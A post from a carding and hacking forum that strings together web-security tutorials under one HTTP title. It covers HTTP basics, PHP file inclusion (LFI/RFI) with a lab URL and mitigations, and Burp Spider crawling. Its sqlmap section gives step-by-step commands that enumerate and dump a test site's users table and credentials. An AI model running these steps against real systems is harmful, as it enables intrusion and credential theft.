Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] Understanding the HTTP Protocol - Printable Version




[Guide] Understanding the HTTP Protocol - NINZA - 05-02-2020

HTTP (Hypertext Transfer Protocol) is basically a client-server protocol, wherein the client (web browser) makes a request to the server and, in return, the server responds to the request. The response from the server is usually in the form of HTML-formatted pages. The HTTP protocol uses port 80 by default, but the web server and the client can be configured to use a different port.
HTTP is a stateless protocol, which means that the server does not retain information between requests. HTTP is the backbone of the World Wide Web (WWW), and being stateless simply means that the server does not remember each client that connects: even if a single user sends multiple requests one after another, they will all be treated as independent requests by the server.
We currently use HTTP/2; its predecessors were HTTP/1.0 and 1.1. At a high level, the major differences between HTTP/1.x and HTTP/2 are:
  • HTTP/2 is binary rather than textual.
  • HTTP/2 is multiplexed: it can use a single connection for parallelism, whereas HTTP/1.x is ordered and blocking.
  • HTTP/2 compresses its headers to reduce overhead.
  • HTTP/2 gives servers the capability to proactively "push" responses to clients.
HTTP works through different request methods:
HTTP Request Methods
  • GET – retrieves information from the given URL.
  • POST – sends data to the server, e.g. customer information or a file upload, typically via HTML forms.
  • DELETE – deletes the file at the specified URL.
  • PUT – uploads a file to the specified URL.
  • TRACE – performs a message loop-back test: the server echoes the received request back to the client.
  • HEAD – retrieves only the HTTP headers, with no document body.
  • OPTIONS – lists the HTTP methods that the server supports.
There is a major difference between the GET and POST methods which people often fail to understand. Once you understand it properly, you can make better decisions about the security of your web application. The differences are as follows:
  • GET requests can be cached; POST requests are never cached.
  • GET requests remain in the browser history; POST requests do not.
  • GET requests can be bookmarked; POST requests cannot.
  • GET requests have a length restriction (the URL); POST requests have no practical length restriction.
  • GET should be used to retrieve data; POST should be used to submit data.
  • GET should never be used for sensitive data, since the parameters are exposed in the URL; POST should always be used for sensitive data, though neither is encrypted without HTTPS.
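These differences come down to where the parameters travel. A minimal Python sketch (the URL and parameter names are made up for illustration):

```python
from urllib.parse import urlencode

params = {"user": "alice", "q": "shoes"}

# GET: parameters travel in the URL itself, so they are visible,
# cacheable, bookmarkable, and subject to URL length limits
get_url = "http://example.com/search?" + urlencode(params)

# POST: the same parameters travel in the request body instead,
# so they stay out of the URL, the history, and most caches
post_body = urlencode(params).encode()

print(get_url)    # http://example.com/search?user=alice&q=shoes
print(post_body)  # b'user=alice&q=shoes'
```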
An HTTP client sends an HTTP request to a server in the form of a request message, which has the following format:


GET / HTTP/1.1
Host: yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

There are several fields in the header, but we will discuss the more important ones:
Host: This header field identifies an individual website by hostname when several websites share the same IP address.
User-Agent: The web browser sets this field to identify its own type and version, but the end user can spoof it; this is usually done by a malicious user to retrieve content designed for other types of web browsers.
Cookie: This field stores a temporary value shared between the client and server, typically for session management.
Referer: This is another important field that you will often see when you are redirected from one URL to another. It contains the address of the previous web page from which the link to the current page was followed. Attackers can tamper with the Referer field, for example in an XSS attack, to redirect the user to a malicious website.
Accept-Encoding: This field defines the compression schemes supported by the client; gzip and deflate are the most common. There are other header fields too, but they are of little use to penetration testers.
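To see how these header fields fit together on the wire, here is a short Python sketch that assembles the raw text of a request like the one above (the helper name and header values are our own, not part of any library):

```python
def build_get_request(host, path="/", headers=None):
    """Assemble the raw text of an HTTP/1.1 GET request."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    # Header lines are separated by CRLF; a blank line ends the header block
    return "\r\n".join(lines) + "\r\n\r\n"

request = build_get_request(
    "yahoo.com",
    headers={
        "User-Agent": "Mozilla/5.0",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "keep-alive",
    },
)
print(request)
```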
Response
When a request is sent to the server, the server replies with a response. The following is an example:
HTTP/1.1 200 OK
Date: Sat, 10 Jun 2017 05:17:18 GMT
Set-Cookie: autorf=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/;
domain=in.yahoo.com
Content-Type: text/html; charset=UTF-8
Server: ATS
Expires: -1
Content-Length: 477864

HTTP Response Code: The Status-Code element is a 3-digit integer; the first digit defines the class of response, while the last two digits have no categorization role. There are 5 values for the first digit:
  • 1xx (Informational) – e.g. 100 Continue: the server agrees to handle the client's request.
  • 2xx (Success) – e.g. 200 OK: the request succeeded; 204 No Content: there is no body to return.
  • 3xx (Redirection) – e.g. 301 Moved Permanently: the page has moved; 304 Not Modified: the cached page is still valid.
  • 4xx (Client error) – e.g. 403 Forbidden: access to the page is denied; 404 Not Found: the page was not found.
  • 5xx (Server error) – e.g. 500 Internal Server Error; 503 Service Unavailable: try again later.
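Since only the first digit carries the classification, mapping any code to its class is a one-line integer division. A small sketch:

```python
def status_class(code):
    """Map a 3-digit HTTP status code to its response class."""
    classes = {
        1: "Informational",
        2: "Success",
        3: "Redirection",
        4: "Client error",
        5: "Server error",
    }
    # Only the first digit matters, so divide away the last two
    return classes.get(code // 100, "Unknown")

print(status_class(200))  # Success
print(status_class(404))  # Client error
print(status_class(503))  # Server error
```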
HTTP Version: The first line of the response indicates the protocol version; a server supporting HTTP version 1.1 returns "HTTP/1.1"
Date: The date and time that the message was originated
Set-Cookie: This field, if defined, will contain a random value that can be used by the server to identify the client and store temporary data
Server: This field is of interest to a penetration tester and will help in the recon phase of a test. It displays useful information about the web server hosting the website.
Content-Length: This field will contain a value indicating the number of bytes in the body of the response. It is used so that the other party can know when the current request/response has finished.

You can insert the content of one PHP file into another PHP file before the server executes it, with the include statement. This can be used to share functions, headers, footers, or other elements that are reused on multiple pages.
This makes it easy for developers to change the layout of a complete website with minimal effort.
If a change is required, then instead of editing thousands of files you change only the included file.
Assume we have a standard footer file called "footer.php" that looks like this:
<?php
echo "<p>Copyright &copy; 2010-" . date("Y") . " hackingartices.in</p>";
?>

Example 1
To include the footer file in a page, use the include statement:
<html>
<body>
<h1>Welcome to Hacking Articles</h1>
<p>Some text.</p>
<p>Some more text.</p>
<?php include 'footer.php';?>
</body>
</html>


Example 2
Assume we have a file called “vars.php“, with some variables defined:
<?php
$color='red';
$car='BMW';
?>


<html>
<body>
<h1>Welcome to my home page!</h1>
<?php include 'vars.php';
echo "I have a $color $car.";
?>
</body>
</html>


Output: I have a red BMW.
PHP require Statement
The require statement is also used to include a file in PHP code.
However, there is one big difference between include and require: when a file is included with the include statement and PHP cannot find it, the script will continue to execute:
Example 3

<html>
<body>
<h1>Welcome to my home page!</h1>
<?php include 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>


Output: PHP emits a warning about the missing file, but the script continues and the echo statement still executes (with $color and $car undefined).
If we do the same example using the require statement, the echo statement will not be executed, because script execution halts after the require statement returns a fatal error:
<html>
<body>
<h1>Welcome to my home page!</h1>
<?php require 'noFileExists.php';
echo "I have a $color $car.";
?>
</body>
</html>


No output: the fatal error stops the script before the echo statement.
PHP require_once Statement
require_once works the same way as require, but includes the called file only once. The only difference between require and require_once is that if the file has already been included, the calling script ignores further inclusions.
Example 4

echo.php
<?php
echo "Hello";
?>

test.php
<?php
require('echo.php');
require_once('echo.php');
?>


Output: "Hello" (printed once; the require_once call ignores the second inclusion).
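Python's import mechanism behaves much like require_once: a module's top-level code runs on the first import and is cached afterwards. A rough analogy (the module name echo_mod and the temp-directory setup are our own invention):

```python
import contextlib, io, os, sys, tempfile

# Create a throwaway module whose top-level code prints, like echo.php
tmpdir = tempfile.mkdtemp()
with open(os.path.join(tmpdir, "echo_mod.py"), "w") as f:
    f.write('print("Hello")\n')
sys.path.insert(0, tmpdir)

buf = io.StringIO()
with contextlib.redirect_stdout(buf):
    import echo_mod  # first import: the module body runs and prints "Hello"
    import echo_mod  # already cached in sys.modules: prints nothing

print(repr(buf.getvalue()))  # 'Hello\n' -- printed only once
```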
Note
allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is disabled as well.
You can enable allow_url_include from php.ini:
/etc/php7/apache2/php.ini
allow_url_include = On



File Inclusion Attacks
A file inclusion attack allows an attacker to include a file on the web server through a PHP script. The vulnerability arises when a web application lets the client submit input that is used to build file paths, or upload files to the server.
This can lead to the following attacks:
  • Code execution on the web server
  • Cross Site Scripting Attacks (XSS)
  • Denial of service (DOS)
  • Data Manipulation Attacks
Two Types:
  • Local File Inclusion
  • Remote File Inclusion
Local File Inclusion (LFI)
A local file inclusion vulnerability occurs when a file to which the PHP process has access is passed as a parameter to the PHP function include or require_once.
[Image: 1.png?w=687&ssl=1]
This vulnerability occurs, for example, when a page receives as input the path of the file that has to be included, and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.
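The traversal itself is easy to reproduce. A Python sketch of the vulnerable path-building pattern and a basic containment check (BASE_DIR and the filenames are hypothetical):

```python
import os

BASE_DIR = "/var/www/pages"  # hypothetical directory of includable pages

def naive_path(user_input):
    # Vulnerable pattern: user input is joined to the base directory without
    # sanitization, so dot-dot-slash sequences can escape BASE_DIR entirely
    return os.path.normpath(os.path.join(BASE_DIR, user_input))

def is_within_base(path):
    # Containment check: resolve the path and require it to stay under BASE_DIR
    base = os.path.realpath(BASE_DIR)
    return os.path.realpath(path).startswith(base + os.sep)

print(naive_path("../../../etc/passwd"))                  # /etc/passwd
print(is_within_base(naive_path("about.php")))            # True
print(is_within_base(naive_path("../../../etc/passwd")))  # False
```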
Example – Local File Inclusion

[Image: 2.png?w=687&ssl=1]

[Image: 3.png?w=687&ssl=1]

Remote File Inclusion (RFI)
Remote File Inclusion occurs when the URI of a file located on a different server is passed as a parameter to the PHP function include, include_once, require, or require_once. PHP incorporates the retrieved content into the page, and if that content happens to be PHP source code, PHP executes it.
PHP remote file inclusion allows an attacker to embed his or her own PHP code inside a vulnerable PHP script, which may lead to disastrous results such as allowing the attacker to execute remote commands on the web server, deface parts of the site, or even steal confidential information.

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=http://google.com

[Image: 4.png?w=687&ssl=1]
Mitigation
  • Strong Input Validation
  • A whitelist of acceptable inputs
  • Reject any inputs that do not strictly conform to specifications
  • For filenames, use a stringent whitelist that limits the character set to be used
  • Exclude directory separators such as “/”
  • Use a whitelist of allowable file extensions
  • Environment Hardening
  • Develop and run your code in the most recent versions of PHP available
  • Configure your PHP applications so that they do not use register_globals
  • Set allow_url_fopen to false, which limits the ability to include files from remote locations
  • Run your code using the lowest privileges
  • Use a vetted library or framework that does not allow this weakness.
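Several of these points can be combined into a single validation routine. A minimal sketch, assuming a hypothetical set of includable pages:

```python
import re

ALLOWED_PAGES = {"home", "about", "contact"}  # whitelist of acceptable inputs
SAFE_NAME = re.compile(r"[a-z0-9_]+")         # stringent character whitelist

def resolve_include(page):
    """Return a file to include only if the input passes every check."""
    # Reject anything not strictly conforming: bad characters (including
    # directory separators) or names outside the whitelist
    if not SAFE_NAME.fullmatch(page) or page not in ALLOWED_PAGES:
        return "home.php"  # fall back to a safe default
    return page + ".php"

print(resolve_include("about"))                # about.php
print(resolve_include("../../etc/passwd"))     # home.php (separators rejected)
print(resolve_include("http://evil.example"))  # home.php (not whitelisted)
```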

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port, and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant columns' names contain strings like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.
[Image: 1.png?w=687&ssl=1]
These options can be used to enumerate the back-end database management system information, structure, and data contained in the tables.
[Image: 2.png?w=687&ssl=1]
Sometimes you visit websites that let you select a product item through a picture gallery; if you observe the URL, you will notice that the product item is requested through its product ID number.
Let’s take an example

So when an attacker visits such a website, he always checks the web server for a SQL vulnerability before launching a SQL injection attack.
[Image: 3.png?w=687&ssl=1]
Let's check how an attacker verifies a SQL vulnerability.
The attacker will try to break the query in order to get an error message; if he successfully receives an error message, it confirms that the web server is vulnerable to SQL injection.

'

From the screenshot you can see that we have successfully received an error message; now we can mount a SQL injection attack on the web server to fetch database information.
[Image: 4.1.png?w=687&ssl=1]
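Why does a single quote cause this? A minimal illustration using Python's bundled sqlite3 module (the table and values are invented), which also shows the parameterized form that defeats the attack:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'shoes')")

user_input = "1'"  # the stray quote appended to a product ID

# Naive string concatenation: the quote breaks the SQL syntax, and the
# resulting error message is exactly what the attacker is probing for
error = None
try:
    conn.execute("SELECT name FROM products WHERE id = " + user_input)
except sqlite3.OperationalError as exc:
    error = str(exc)
print("error:", error)

# Parameterized query: the input is bound as data, never parsed as SQL
rows = conn.execute(
    "SELECT name FROM products WHERE id = ?", (user_input,)
).fetchall()
print(rows)  # [] -- no row matches the literal string "1'"
```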
Databases
For database penetration testing we often choose sqlmap; this tool is very helpful for beginners who are unable to retrieve database information manually or are unaware of SQL injection techniques.
Open a terminal in Kali Linux and type the following command, which starts a SQL injection attack on the targeted website:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

-u: target URL
--dbs: enumerate database names
--batch: never ask for user input; use the default behavior whenever input would be required
[Image: 4.png?w=687&ssl=1]
Here, from the given screenshot, you can see we have successfully retrieved the database name "acuart".
[Image: 5.png?w=687&ssl=1]
Tables
As we know, a database is a set of records organized in multiple tables; therefore we now use another command to fetch the table names from inside the database system:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

-D: DBMS database to enumerate (the fetched database name)
--tables: enumerate the tables of the DBMS database
[Image: 6.png?w=687&ssl=1]
As a result, as shown in the screenshot, we have enumerated all the table names of the database system. There are 8 tables inside the database "acuart", as follows:
T1: artists
T2: carts
T3: categ
T4: featured
T5: guestbook
T6: pictures
T7: products
T8: users
[Image: 7.png?w=687&ssl=1]
Columns
Now we will enumerate the column names of the desired table. Since we know there is a users table inside the database acuart, and we want to know all column names of the users table, we generate another command for column enumeration:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

-T: DBMS table to enumerate (the fetched table name)
--columns: enumerate the columns of the DBMS table
[Image: 8.png?w=687&ssl=1]
[Image: 9.png?w=687&ssl=1]
Get data from a table
Slowly and gradually we have uncovered many details of the database, but the last and most important step is to retrieve the information stored inside the columns of a table. Hence, finally, we generate a command that dumps the contents of the users table:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

--dump: dump all entries of the DBMS table
[Image: 10.png?w=687&ssl=1]
Here, from the given screenshot, you can see it has dumped the entire contents of the users table; the users table mainly contains the login credentials of other users. These credentials could be used to log into the server on behalf of those users.
[Image: 12.png?w=687&ssl=1]
Dump All
The last command is one of the most powerful in sqlmap and will save you time in database penetration testing; it performs all the above functions at once and dumps the entire database, including table names, columns, and records:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch

[Image: 13.png?w=687&ssl=1]
This will give you all the information at once, including database names as well as table records.
Try it yourself!!!
[Image: 14.png?w=687&ssl=1]

Hello friends! Today we are doing web penetration testing using the Burp Suite Spider, which very rapidly crawls an entire web application and dumps the structure of the targeted website.
Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.
Let’s begin!!
First, the attacker needs to configure the browser and the Burp proxy to work together properly; the chosen target website will then be enumerated.

[Image: 1.png?w=687&ssl=1]
In the screenshot given below you can see there is currently no targeted website inside the site map of Burp Suite. To add your target website to it, you need to fetch the HTTP request sent by the browser to the web application server, using the intercept option of the Proxy tab.
Click on the Proxy tab and turn intercept on in order to catch the HTTP request.
[Image: 2.png?w=687&ssl=1]
Here you can observe that I have fetched the HTTP request of the target website; now send it to the Spider with the help of the Action tab.

[Image: 3.png?w=687&ssl=1]
Confirm your action by clicking YES; Burp will alter the existing target scope to include the preferred item and all sub-items contained in the site map tree.
[Image: 5.png?w=687&ssl=1]
Now choose the Spider tab for the next step; here you will find two subtabs, Control and Options.
Burp Spider – Control Tab
This tab is used to start and stop Burp Spider, monitor its progress, and define the spidering scope.
Spider Status
Use these settings to monitor and control Burp Spider:
  • Spider is paused/running– This toggle button is used to start and stop the Spider. While the Spider is stopped it will not make any requests of its own, although it will continue to process responses generated via Burp Proxy (if passive spidering is enabled), and any newly-discovered items that are within the spidering scope will be queued to be requested if the Spider is restarted.
  • Clear queues – If you want to reprioritize your work, you can completely clear the currently queued items so that other items can be added to the queue. Note that cleared items may be re-queued if they remain in scope and the Spider's parser encounters new links to them.
Spider Scope
This panel lets you define exactly what is in the scope for the Spider to request.
The best way to handle spidering scope is normally to use the suite-wide target scope; by default, the Spider will use that scope.
Burp Spider Options
This tab contains options for the basic crawler settings, passive spidering, form submission, application login, the Spider engine, and HTTP request headers.
[Image: 6.png?w=687&ssl=1]
You can monitor the status of the Spider when running, via the Control tab. Any newly discovered content will be added to the Target site map.
When spidering a selected branch of the site map, Burp will carry out the following actions (depending on your settings):
  • Request any unrequested URLs already present within the branch.
  • Submit any discovered forms whose action URLs lay within the branch.
  • Re-request any items in the branch that previously returned 304 status codes, to retrieve fresh (uncached) copies of the application’s responses.
  • Parse all content retrieved to identify new URLs and forms.
  • Recursively repeat these steps as new content is discovered.
  • Continue spidering all in-scope areas until no new content is discovered.
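The crawl loop described above is conceptually simple. A toy sketch over an in-memory site map (the pages and links are invented; a real spider would issue HTTP requests and parse HTML for links):

```python
from collections import deque

# Hypothetical site: each page maps to the links found on it
SITE = {
    "/": ["/products", "/about"],
    "/products": ["/products/1", "/"],
    "/products/1": [],
    "/about": ["/contact"],
    "/contact": [],
}

def spider(start, in_scope=lambda url: True):
    """Breadth-first crawl: request unvisited in-scope URLs, parse for links, repeat."""
    discovered, queue = set(), deque([start])
    while queue:  # continue until no new content is discovered
        url = queue.popleft()
        if url in discovered or not in_scope(url):
            continue
        discovered.add(url)              # "request" the page
        queue.extend(SITE.get(url, []))  # "parse" it for new URLs
    return discovered

print(sorted(spider("/")))  # every reachable page
print(sorted(spider("/", in_scope=lambda u: u == "/" or u.startswith("/products"))))
```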
Hence you can see the targeted website has been added to the site map as a new scope for web crawling. Right-click the selected URL and choose the "Spider this host" option, which automatically starts web crawling.
[Image: 7.png?w=687&ssl=1]
When you click on the preferred target in the site map, further content discovered by the Spider will be added inside it, as shown in the image below.
From the screenshot you can see it dumps all items of the website, even showing the request and response for each host.
[Image: 8.png?w=687&ssl=1]